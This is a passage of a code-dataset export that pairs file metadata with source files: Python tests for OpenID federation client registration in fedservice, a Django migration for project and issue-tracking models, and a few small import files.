| 47.735294 | 92 | 0.688694 | 822 | 6,492 | 5.199513 | 0.114355 | 0.05475 | 0.050538 | 0.037904 | 0.868975 | 0.846514 | 0.846514 | 0.807206 | 0.807206 | 0.801591 | 0 | 0.003199 | 0.229667 | 6,492 | 135 | 93 | 48.088889 | 0.85143 | 0.252773 | 0 | 0.621951 | 0 | 0 | 0.072379 | 0.039933 | 0 | 0 | 0 | 0 | 0 | 1 | 0.073171 | false | 0 | 0.085366 | 0 | 0.207317 | 0.109756 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
dbcfe1fa154406a3044c8b75fafe3edb788d380e | 24,957 | py | Python | tests/test_12_registration.py | peppelinux/fedservice | 0dc5fd0bd33e181b6a1a9bbef6835b2ce5d2f568 | [
"Apache-2.0"
] | 1 | 2020-09-30T13:07:41.000Z | 2020-09-30T13:07:41.000Z | tests/test_12_registration.py | peppelinux/fedservice | 0dc5fd0bd33e181b6a1a9bbef6835b2ce5d2f568 | [
"Apache-2.0"
] | null | null | null | tests/test_12_registration.py | peppelinux/fedservice | 0dc5fd0bd33e181b6a1a9bbef6835b2ce5d2f568 | [
"Apache-2.0"
] | null | null | null | import os
from oidcop.cookie_handler import CookieHandler
from oidcop.server import Server
from oidcop.user_authn.authn_context import UNSPECIFIED
from oidcop.user_authn.user import NoAuthn
from oidcrp.entity import Entity
from oidcrp.exception import OtherError
import pytest
import responses
from fedservice import FederationEntity
from fedservice.entity_statement.statement import TrustChain
from fedservice.metadata_api.fs2 import read_info
from fedservice.op import authorization
from fedservice.op import provider_config
from fedservice.op import registration
from fedservice.rp.authorization import FedAuthorization
from fedservice.rp.provider_info_discovery import FedProviderInfoDiscovery
from fedservice.rp.registration import Registration
from .utils import DummyCollector
from .utils import Publisher
BASE_PATH = os.path.abspath(os.path.dirname(__file__))
ROOT_DIR = os.path.join(BASE_PATH, 'base_data')
KEYSPEC = [
{"type": "RSA", "use": ["sig"]},
{"type": "EC", "crv": "P-256", "use": ["sig"]},
]
COOKIE_KEYDEFS = [
{"type": "oct", "kid": "sig", "use": ["sig"]},
{"type": "oct", "kid": "enc", "use": ["enc"]}
]
ENTITY_ID = 'https://foodle.uninett.no'
ANCHOR = {'https://feide.no': read_info(os.path.join(ROOT_DIR, 'feide.no'), "feide.no", "jwks")}
class TestExplicit(object):
@pytest.fixture(autouse=True)
def create_endpoint(self):
# First the RP
entity = Entity(config={
'behaviour': {
'federation_types_supported': ['explicit']
},
'issuer': "https://op.ntnu.no",
'keys': {'key_defs': KEYSPEC}
})
service_context = entity.client_get("service_context")
# the federation part of the RP
self.rp_federation_entity = FederationEntity(
entity_id=ENTITY_ID, trusted_roots=ANCHOR,
authority_hints=['https://ntnu.no'],
entity_type='openid_relying_party', opponent_entity_type='openid_provider'
)
self.rp_federation_entity.collector = DummyCollector(
trusted_roots=ANCHOR, root_dir=ROOT_DIR)
self.rp_federation_entity.keyjar.import_jwks(
read_info(os.path.join(ROOT_DIR, 'foodle.uninett.no'), 'foodle.uninett.no', 'jwks'),
issuer_id=ENTITY_ID)
# add the federation part to the service context
service_context.federation_entity = self.rp_federation_entity
# The RP has/supports 3 services
self.service = {
'discovery': FedProviderInfoDiscovery(entity.client_get),
'registration': Registration(entity.client_get),
'authorization': FedAuthorization(entity.client_get),
}
# and now for the OP
op_entity_id = "https://op.ntnu.no"
conf = {
"issuer": op_entity_id,
"password": "mycket hemligt",
"token_expires_in": 600,
"grant_expires_in": 300,
"refresh_token_expires_in": 86400,
"httpc_param": {'verify': False, "timeout": 2},
"claims_interface": {"class": "oidcop.session.claims.ClaimsInterface", "kwargs": {}},
"cookie_handler": {
"class": CookieHandler,
"kwargs": {
"keys": {"key_defs": COOKIE_KEYDEFS},
"name": {
"session": "oidc_op",
"register": "oidc_op_reg",
"session_management": "oidc_op_sman"
}
},
},
"endpoint": {
'provider_info': {
'path': '.well-known/openid-federation',
'class': provider_config.ProviderConfiguration,
'kwargs': {'client_authn_method': None}
},
'registration': {
'path': 'fed_registration',
'class': registration.Registration,
'kwargs': {'client_authn_method': None}
},
'authorization': {
'path': 'authorization',
'class': authorization.Authorization,
'kwargs': {
"response_modes_supported": ['query', 'fragment', 'form_post'],
"claims_parameter_supported": True,
"request_parameter_supported": True,
"request_uri_parameter_supported": True,
"client_authn_method": ['request_param']
}
}
},
"keys": {
"private_path": "own/jwks.json",
"uri_path": "static/jwks.json",
"key_defs": KEYSPEC
},
"authentication": {
"anon": {
'acr': UNSPECIFIED,
"class": NoAuthn,
"kwargs": {"user": "diana"}
}
},
'template_dir': 'template'
}
server = Server(conf)
self.registration_endpoint = server.server_get("endpoint", "registration")
self.authorization_endpoint = server.server_get("endpoint", "authorization")
self.provider_endpoint = server.server_get("endpoint", "provider_config")
# === Federation stuff =======
federation_entity = FederationEntity(
op_entity_id, trusted_roots=ANCHOR,
authority_hints=['https://ntnu.no'],
entity_type='openid_relying_party',
httpd=Publisher(ROOT_DIR),
opponent_entity_type='openid_relying_party')
federation_entity.keyjar.import_jwks(
read_info(os.path.join(ROOT_DIR, 'op.ntnu.no'), 'op.ntnu.no', 'jwks'),
issuer_id=op_entity_id)
federation_entity.collector = DummyCollector(
httpd=Publisher(ROOT_DIR),
trusted_roots=ANCHOR,
root_dir=ROOT_DIR)
self.registration_endpoint.server_get(
"endpoint_context").federation_entity = federation_entity
def test_explicit_registration(self):
_registration_service = self.service['registration']
# Using the RP's federation entity instance
_fe = _registration_service.client_get("service_context").federation_entity
_endpoint_context = self.registration_endpoint.server_get("endpoint_context")
# This is cheating. Getting the OP provider info
trust_chain = TrustChain()
trust_chain.metadata = _endpoint_context.provider_info
trust_chain.anchor = "https://feide.no"
trust_chain.verified_chain = [{'iss': "https://ntnu.no"}]
self.service['discovery'].update_service_context([trust_chain])
# add the OP's federation keys
self.rp_federation_entity.keyjar.import_jwks(
read_info(os.path.join(ROOT_DIR, 'op.ntnu.no'), 'op.ntnu.no', 'jwks'),
issuer_id=_endpoint_context.provider_info['issuer'])
# construct the client registration request
req_args = {
'entity_id': self.rp_federation_entity.entity_id,
'redirect_uris': ['https://foodle.uninett.no/cb']
}
self.rp_federation_entity.proposed_authority_hints = ['https://ntnu.no']
jws = _registration_service.construct(request_args=req_args)
assert jws
# The OP handles the registration request
res = self.registration_endpoint.process_request(jws)
assert res
reg_resp = self.registration_endpoint.do_response(**res)
assert set(reg_resp.keys()) == {'response', 'http_headers', 'cookie'}
# The RP parses the OP's response
args = _registration_service.parse_response(reg_resp['response'], request=jws)
assert set(args.keys()) == {'entity_id', 'client_id', 'contacts', 'application_type',
'redirect_uris', 'response_types', 'client_id_issued_at',
'client_secret', 'grant_types', 'client_secret_expires_at'}
class TestAutomatic(object):
@pytest.fixture(autouse=True)
def create_endpoint(self):
# First the RP
entity = Entity(config={
'behaviour': {
'federation_types_supported': ['explicit']
},
'issuer': "https://op.ntnu.no",
'keys': {'key_defs': KEYSPEC},
"httpc_param": {'verify': False, "timeout": 2},
})
# the federation part of the RP
self.rp_federation_entity = FederationEntity(
entity_id=ENTITY_ID, trusted_roots=ANCHOR,
authority_hints=['https://ntnu.no'],
entity_type='openid_relying_party', opponent_entity_type='openid_provider'
)
self.rp_federation_entity.collector = DummyCollector(
trusted_roots=ANCHOR, root_dir=ROOT_DIR)
self.rp_federation_entity.keyjar.import_jwks(
read_info(os.path.join(ROOT_DIR, 'foodle.uninett.no'), 'foodle.uninett.no', 'jwks'),
issuer_id=ENTITY_ID)
# add the federation part to the service context
entity.client_get("service_context").federation_entity = self.rp_federation_entity
# The RP has/supports 3 services
self.service = {
'discovery': FedProviderInfoDiscovery(entity.client_get),
'registration': Registration(entity.client_get),
'authorization': FedAuthorization(entity.client_get,
conf={"request_object_expires_in": 300}),
}
# and now for the OP
op_entity_id = "https://op.ntnu.no"
conf = {
"issuer": op_entity_id,
"httpc_param": {'verify': False, "timeout": 2},
"password": "mycket hemligt",
"token_expires_in": 600,
"grant_expires_in": 300,
"refresh_token_expires_in": 86400,
"verify_ssl": False,
"cookie_handler": {
"class": CookieHandler,
"kwargs": {
"keys": {"key_defs": COOKIE_KEYDEFS},
"name": {
"session": "oidc_op",
"register": "oidc_op_reg",
"session_management": "oidc_op_sman"
}
},
},
"endpoint": {
'provider_info': {
'path': '.well-known/openid-federation',
'class': provider_config.ProviderConfiguration,
'kwargs': {'client_authn_method': None}
},
'registration': {
'path': 'fed_registration',
'class': registration.Registration,
'kwargs': {'client_authn_method': None}
},
'authorization': {
'path': 'authorization',
'class': authorization.Authorization,
'kwargs': {
"response_modes_supported": ['query', 'fragment', 'form_post'],
"claims_parameter_supported": True,
"request_parameter_supported": True,
"request_uri_parameter_supported": True,
"client_authn_method": ['request_param']
}
}
},
"keys": {
"private_path": "own/jwks.json",
"uri_path": "static/jwks.json",
"key_defs": KEYSPEC
},
"authentication": {
"anon": {
'acr': UNSPECIFIED,
"class": NoAuthn,
"kwargs": {"user": "diana"}
}
},
'template_dir': 'template',
"claims_interface": {"class": "oidcop.session.claims.ClaimsInterface", "kwargs": {}},
'add_on': {
"automatic_registration": {
"function":
"fedservice.op.add_on.automatic_registration.add_support",
"kwargs": {
"new_id": False, # default False
'client_registration_authn_methods_supported': {"ar": ['request_object']},
'where': ['authorization']
}
}
}
}
server = Server(conf)
self.registration_endpoint = server.server_get("endpoint", "registration")
self.authorization_endpoint = server.server_get("endpoint", "authorization")
self.provider_endpoint = server.server_get("endpoint", "provider_config")
# === Federation stuff =======
federation_entity = FederationEntity(
op_entity_id, trusted_roots=ANCHOR,
authority_hints=['https://ntnu.no'],
entity_type='openid_relying_party',
httpd=Publisher(ROOT_DIR),
opponent_entity_type='openid_relying_party')
federation_entity.keyjar.import_jwks(
read_info(os.path.join(ROOT_DIR, 'op.ntnu.no'), 'op.ntnu.no', 'jwks'),
issuer_id=op_entity_id)
federation_entity.collector = DummyCollector(
httpd=Publisher(ROOT_DIR),
trusted_roots=ANCHOR,
root_dir=ROOT_DIR)
self.registration_endpoint.server_get(
"endpoint_context").federation_entity = federation_entity
def test_automatic_registration_new_client_id(self):
_registration_service = self.service['registration']
self.authorization_endpoint.server_get("endpoint_context").provider_info[
'client_registration_authn_methods_supported'] = {"ar": ['request_object']}
self.authorization_endpoint.automatic_registration_endpoint.kwargs['new_id'] = True
# This is cheating. Getting the OP's provider info
_fe = _registration_service.client_get("service_context").federation_entity
statement = TrustChain()
statement.metadata = self.registration_endpoint.server_get("endpoint_context").provider_info
statement.anchor = "https://feide.no"
statement.verified_chain = [{'iss': "https://ntnu.no"}]
with responses.RequestsMock() as rsps:
_jwks = self.authorization_endpoint.server_get("endpoint_context").keyjar.export_jwks()
rsps.add("GET", 'https://op.ntnu.no/static/jwks.json', body=_jwks,
adding_headers={"Content-Type": "application/json"}, status=200)
self.service['discovery'].update_service_context([statement])
# and the OP's federation keys
self.rp_federation_entity.keyjar.import_jwks(
read_info(os.path.join(ROOT_DIR, 'op.ntnu.no'), 'op.ntnu.no', 'jwks'),
issuer_id=self.registration_endpoint.server_get("endpoint_context").provider_info[
'issuer'])
_context = self.service['authorization'].client_get("service_context")
_context.issuer = 'https://op.ntnu.no'
_context.redirect_uris = ['https://foodle.uninett.no/callback']
_context.entity_id = self.rp_federation_entity.entity_id
_context.client_id = self.rp_federation_entity.entity_id
_context.behaviour = {'response_types': ['code']}
_context.provider_info = self.authorization_endpoint.server_get(
"endpoint_context").provider_info
authn_request = self.service['authorization'].construct()
# Have to provide the OP with the client's keys
self.authorization_endpoint.server_get("endpoint_context").keyjar.import_jwks(
_registration_service.client_get("service_context").keyjar.export_jwks(),
ENTITY_ID
)
# The OP handles the authorization request
req = self.authorization_endpoint.parse_request(authn_request.to_dict())
assert "response_type" in req
client_ids = list(self.authorization_endpoint.server_get("endpoint_context").cdb.keys())
assert len(client_ids) == 2 # dynamic and entity_id
assert ENTITY_ID in client_ids
def test_automatic_registration_keep_client_id(self):
# This is cheating. Getting the OP provider info
_registration_service = self.service['registration']
_fe = _registration_service.client_get("service_context").federation_entity
statement = TrustChain()
statement.metadata = self.registration_endpoint.server_get("endpoint_context").provider_info
statement.anchor = "https://feide.no"
statement.verified_chain = [{'iss': "https://ntnu.no"}]
self.service['discovery'].update_service_context([statement])
# and the OP's federation keys
self.rp_federation_entity.keyjar.import_jwks(
read_info(os.path.join(ROOT_DIR, 'op.ntnu.no'), 'op.ntnu.no', 'jwks'),
issuer_id=self.registration_endpoint.server_get("endpoint_context").provider_info[
'issuer'])
service_context = self.service['authorization'].client_get("service_context")
service_context.issuer = 'https://op.ntnu.no'
service_context.redirect_uris = ['https://foodle.uninett.no/callback']
service_context.entity_id = self.rp_federation_entity.entity_id
service_context.client_id = self.rp_federation_entity.entity_id
service_context.behaviour = {'response_types': ['code']}
service_context.provider_info = self.authorization_endpoint.server_get(
"endpoint_context").provider_info
authn_request = self.service['authorization'].construct()
# Have to provide the OP with the client's keys
self.authorization_endpoint.server_get("endpoint_context").keyjar.import_jwks(
_registration_service.client_get("service_context").keyjar.export_jwks(),
ENTITY_ID
)
_auth_endp_context = self.authorization_endpoint.server_get("endpoint_context")
# get rid of the earlier client registrations
# materialize the keys first; deleting entries while iterating over the
# live view would raise a RuntimeError
for k in list(_auth_endp_context.cdb.keys()):
del _auth_endp_context.cdb[k]
# Have to provide the OP with the client's keys
_auth_endp_context.keyjar.import_jwks(
_registration_service.client_get("service_context").keyjar.export_jwks(),
ENTITY_ID
)
# set new_id to False
self.authorization_endpoint.automatic_registration_endpoint.kwargs["new_id"] = False
# The OP handles the authorization request
req = self.authorization_endpoint.parse_request(authn_request.to_dict())
assert "response_type" in req
# reg_resp = self.registration_endpoint.do_response(**res)
# assert set(reg_resp.keys()) == {'response', 'http_headers', 'cookie'}
client_ids = list(_auth_endp_context.cdb.keys())
assert len(client_ids) == 1
assert client_ids[0] == ENTITY_ID
class TestAutomaticNoSupport(object):
@pytest.fixture(autouse=True)
def create_endpoint(self):
# First the RP
entity = Entity(config={
'behaviour': {
'federation_types_supported': ['explicit']
},
'issuer': "https://op.ntnu.no",
'keys': {'key_defs': KEYSPEC},
"httpc_param": {'verify': False, "timeout": 2},
})
# the federation part of the RP
self.rp_federation_entity = FederationEntity(
entity_id=ENTITY_ID, trusted_roots=ANCHOR,
authority_hints=['https://ntnu.no'],
entity_type='openid_relying_party', opponent_entity_type='openid_provider'
)
self.rp_federation_entity.collector = DummyCollector(
trusted_roots=ANCHOR, root_dir=ROOT_DIR)
self.rp_federation_entity.keyjar.import_jwks(
read_info(os.path.join(ROOT_DIR, 'foodle.uninett.no'), 'foodle.uninett.no', 'jwks'),
issuer_id=ENTITY_ID)
# add the federation part to the service context
entity.client_get("service_context").federation_entity = self.rp_federation_entity
# The RP has/supports 3 services
self.service = {
'discovery': FedProviderInfoDiscovery(entity.client_get),
'registration': Registration(entity.client_get),
'authorization': FedAuthorization(entity.client_get),
}
# and now for the OP
op_entity_id = "https://op.ntnu.no"
conf = {
"issuer": op_entity_id,
"password": "mycket hemligt",
"token_expires_in": 600,
"grant_expires_in": 300,
"refresh_token_expires_in": 86400,
"httpc_param": {'verify': False, "timeout": 2},
"claims_interface": {"class": "oidcop.session.claims.ClaimsInterface", "kwargs": {}},
"endpoint": {
'provider_info': {
'path': '.well-known/openid-federation',
'class': provider_config.ProviderConfiguration,
'kwargs': {'client_authn_method': None}
},
'registration': {
'path': 'fed_registration',
'class': registration.Registration,
'kwargs': {'client_authn_method': None}
},
'authorization': {
'path': 'authorization',
'class': authorization.Authorization,
'kwargs': {
"response_modes_supported": ['query', 'fragment', 'form_post'],
"claims_parameter_supported": True,
"request_parameter_supported": True,
"request_uri_parameter_supported": True,
"client_authn_method": ['request_param']
}
}
},
"keys": {
"private_path": "own/jwks.json",
"uri_path": "static/jwks.json",
"key_defs": KEYSPEC
},
"authentication": {
"anon": {
'acr': UNSPECIFIED,
"class": NoAuthn,
"kwargs": {"user": "diana"}
}
},
'template_dir': 'template'
}
server = Server(conf)
# endpoint_context = EndpointContext(conf)
self.registration_endpoint = server.server_get("endpoint", "registration")
self.authorization_endpoint = server.server_get("endpoint", "authorization")
self.provider_endpoint = server.server_get("endpoint", "provider_config")
# === Federation stuff =======
federation_entity = FederationEntity(
op_entity_id, trusted_roots=ANCHOR,
authority_hints=['https://ntnu.no'],
entity_type='openid_relying_party',
httpd=Publisher(ROOT_DIR),
opponent_entity_type='openid_relying_party')
federation_entity.keyjar.import_jwks(
read_info(os.path.join(ROOT_DIR, 'op.ntnu.no'), 'op.ntnu.no', 'jwks'),
issuer_id=op_entity_id)
federation_entity.collector = DummyCollector(
httpd=Publisher(ROOT_DIR),
trusted_roots=ANCHOR,
root_dir=ROOT_DIR)
self.registration_endpoint.server_get(
"endpoint_context").federation_entity = federation_entity
def test_automatic_registration_new_client_id(self):
_registration_service = self.service['registration']
# This is cheating. Getting the OP's provider info
_fe = _registration_service.client_get("service_context").federation_entity
statement = TrustChain()
statement.metadata = self.registration_endpoint.server_get("endpoint_context").provider_info
statement.anchor = "https://feide.no"
statement.verified_chain = [{'iss': "https://ntnu.no"}]
self.service['discovery'].update_service_context([statement])
# and the OP's federation keys
self.rp_federation_entity.keyjar.import_jwks(
read_info(os.path.join(ROOT_DIR, 'op.ntnu.no'), 'op.ntnu.no', 'jwks'),
issuer_id=self.registration_endpoint.server_get("endpoint_context").provider_info[
'issuer'])
_context = self.service['authorization'].client_get("service_context")
_context.issuer = 'https://op.ntnu.no'
_context.redirect_uris = ['https://foodle.uninett.no/callback']
_context.entity_id = self.rp_federation_entity.entity_id
# _context.client_id = self.rp_federation_entity.entity_id
_context.behaviour = {'response_types': ['code']}
_context.provider_info = self.authorization_endpoint.server_get(
"endpoint_context").provider_info
# The client not registered and the OP not supporting automatic client registration
with pytest.raises(OtherError):
self.service['authorization'].construct()
| 42.661538 | 100 | 0.595504 | 2,475 | 24,957 | 5.712323 | 0.103838 | 0.05319 | 0.033668 | 0.037346 | 0.831659 | 0.820625 | 0.811218 | 0.79205 | 0.758735 | 0.733131 | 0 | 0.003052 | 0.291061 | 24,957 | 584 | 101 | 42.734589 | 0.796021 | 0.063389 | 0 | 0.680258 | 0 | 0 | 0.220832 | 0.037891 | 0 | 0 | 0 | 0 | 0.021459 | 1 | 0.015021 | false | 0.006438 | 0.070815 | 0 | 0.092275 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
9154bc0fd2ca64152e68a12d872eb73d55debc66 | 39 | py | Python | tests/vir.py | bretth/woven | ec1da7b401a335f43129e7115fe7a4d145649f1e | [
"BSD-3-Clause"
] | 5 | 2015-05-26T15:02:11.000Z | 2016-10-04T19:39:38.000Z | tests/vir.py | bretth/woven | ec1da7b401a335f43129e7115fe7a4d145649f1e | [
"BSD-3-Clause"
] | 3 | 2015-01-23T01:23:27.000Z | 2019-08-09T12:43:26.000Z | tests/vir.py | bretth/woven | ec1da7b401a335f43129e7115fe7a4d145649f1e | [
"BSD-3-Clause"
] | null | null | null |
from fabric.state import env
| 4.875 | 28 | 0.615385 | 5 | 39 | 4.8 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.358974 | 39 | 7 | 29 | 5.571429 | 0.96 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
91967e2144f9d6d55110528b39828fb6ae99f71c | 7,174 | py | Python | apps/api/migrations/0001_initial.py | ramseylove/project_management_api | 9c76c4464baf7f9af6c977a42ccd7eb3ce205c7b | [
"MIT"
] | null | null | null | apps/api/migrations/0001_initial.py | ramseylove/project_management_api | 9c76c4464baf7f9af6c977a42ccd7eb3ce205c7b | [
"MIT"
] | null | null | null | apps/api/migrations/0001_initial.py | ramseylove/project_management_api | 9c76c4464baf7f9af6c977a42ccd7eb3ce205c7b | [
"MIT"
] | null | null | null | # Generated by Django 3.1.7 on 2021-08-24 18:23
import apps.api.models
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import imagekit.models.fields
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Client',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('contact', models.CharField(max_length=200)),
('email', models.EmailField(max_length=254)),
],
),
migrations.CreateModel(
name='Comment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateField(auto_now_add=True, verbose_name='Created At')),
('modified_at', models.DateField(auto_now=True, verbose_name='Modified At')),
('comment', models.TextField()),
('created_by', models.ForeignKey(default=1, on_delete=django.db.models.deletion.SET_DEFAULT, related_name='+', to=settings.AUTH_USER_MODEL)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='Issue',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateField(auto_now_add=True, verbose_name='Created At')),
('modified_at', models.DateField(auto_now=True, verbose_name='Modified At')),
('summary', models.CharField(max_length=100)),
('description', models.TextField(verbose_name='Issue Description')),
('status', models.IntegerField(choices=[(1, 'On Hold'), (2, 'To Do'), (3, 'In Progress'), (4, 'In Review'), (5, 'Done')], default=1, verbose_name='Issue Status')),
('priority', models.IntegerField(choices=[(1, 'Low'), (2, 'Medium'), (3, 'High')], default=1, verbose_name='Issue Priority')),
('issueType', models.IntegerField(choices=[(1, 'Task'), (2, 'Bug'), (3, 'Story')], default=1, verbose_name='Issue Type')),
('created_by', models.ForeignKey(default=1, on_delete=django.db.models.deletion.SET_DEFAULT, related_name='+', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(default=None, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='Project',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateField(auto_now_add=True, verbose_name='Created At')),
('modified_at', models.DateField(auto_now=True, verbose_name='Modified At')),
('name', models.CharField(max_length=200, unique=True)),
('description', models.TextField()),
('priority', models.IntegerField(choices=[(1, 'Low'), (2, 'Medium'), (3, 'High')], default=1, verbose_name='Project Priority')),
('status', models.IntegerField(choices=[(1, 'Planning'), (2, 'Ready'), (3, 'In Progress'), (4, 'In Review'), (5, 'Finished')], default=1, verbose_name='Project Status')),
('client', models.ForeignKey(default=1, on_delete=django.db.models.deletion.SET_DEFAULT, to='api.client')),
('created_by', models.ForeignKey(default=1, on_delete=django.db.models.deletion.SET_DEFAULT, related_name='+', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(default=None, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='IssueImage',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateField(auto_now_add=True, verbose_name='Created At')),
('modified_at', models.DateField(auto_now=True, verbose_name='Modified At')),
('issue_image', imagekit.models.fields.ProcessedImageField(upload_to=apps.api.models.PathAndRename('issue_images'))),
('created_by', models.ForeignKey(default=1, on_delete=django.db.models.deletion.SET_DEFAULT, related_name='+', to=settings.AUTH_USER_MODEL)),
('issue', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='issue_images', to='api.issue')),
('modified_by', models.ForeignKey(default=None, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
],
options={
'abstract': False,
},
),
migrations.AddField(
model_name='issue',
name='project',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='issues', to='api.project'),
),
migrations.CreateModel(
name='CommentImage',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateField(auto_now_add=True, verbose_name='Created At')),
('modified_at', models.DateField(auto_now=True, verbose_name='Modified At')),
('comment_image', imagekit.models.fields.ProcessedImageField(upload_to=apps.api.models.PathAndRename('issue_images'))),
('comment', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='comment_images', to='api.comment')),
('created_by', models.ForeignKey(default=1, on_delete=django.db.models.deletion.SET_DEFAULT, related_name='+', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(default=None, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
],
options={
'abstract': False,
},
),
migrations.AddField(
model_name='comment',
name='issue',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='api.issue'),
),
migrations.AddField(
model_name='comment',
name='modified_by',
field=models.ForeignKey(default=None, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL),
),
]
| 58.325203 | 186 | 0.608308 | 782 | 7,174 | 5.392583 | 0.14578 | 0.057387 | 0.053118 | 0.083472 | 0.799146 | 0.757173 | 0.730851 | 0.720892 | 0.720892 | 0.720892 | 0 | 0.010993 | 0.239197 | 7,174 | 122 | 187 | 58.803279 | 0.761634 | 0.006273 | 0 | 0.582609 | 1 | 0 | 0.127122 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.043478 | 0 | 0.078261 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
91d09ca86bacf37355a00e0b1404956b64e0cb1c | 31 | py | Python | smilescombine/__init__.py | LiamWilbraham/smilescombine | fa0c4b5ad543dbd4023d7248a10c4fbe2c2ffb0d | [
"MIT"
] | 4 | 2019-01-15T10:21:50.000Z | 2019-08-18T21:01:23.000Z | smilescombine/__init__.py | LiamWilbraham/smilescombine | fa0c4b5ad543dbd4023d7248a10c4fbe2c2ffb0d | [
"MIT"
] | 1 | 2020-07-02T23:05:29.000Z | 2020-08-02T15:35:18.000Z | smilescombine/__init__.py | LiamWilbraham/smilescombine | fa0c4b5ad543dbd4023d7248a10c4fbe2c2ffb0d | [
"MIT"
] | 5 | 2019-07-18T11:50:48.000Z | 2021-07-12T10:46:11.000Z | from .combiner import Combiner
| 15.5 | 30 | 0.83871 | 4 | 31 | 6.5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.129032 | 31 | 1 | 31 | 31 | 0.962963 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
37f635214b04ce2a328568e76146e931daba3ad3 | 50 | py | Python | image_keras/supports/dl/__init__.py | tenkeyless/image-keras | 09da179d75bb7a17d76e4fd7456b1667c8b4f62b | [
"MIT"
] | null | null | null | image_keras/supports/dl/__init__.py | tenkeyless/image-keras | 09da179d75bb7a17d76e4fd7456b1667c8b4f62b | [
"MIT"
] | 1 | 2020-06-18T06:47:32.000Z | 2020-06-18T06:47:32.000Z | common_py/dl/__init__.py | tenkeyless/common_py | fae49f038dacecef468a5c0972fdbe0d6a5a66b9 | [
"MIT"
] | null | null | null | from .report import *
from .report_slack import *
| 16.666667 | 27 | 0.76 | 7 | 50 | 5.285714 | 0.571429 | 0.540541 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.16 | 50 | 2 | 28 | 25 | 0.880952 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
532f1990d10135c6762a958c609263b90c3ae08a | 10,636 | py | Python | models/action_recognition_2/tests/common/action_recognition_test_case.py | raymondlo84/training_extensions | dc9f45957648d5f9b9ca58c4e62f80e76f5270e9 | [
"Apache-2.0"
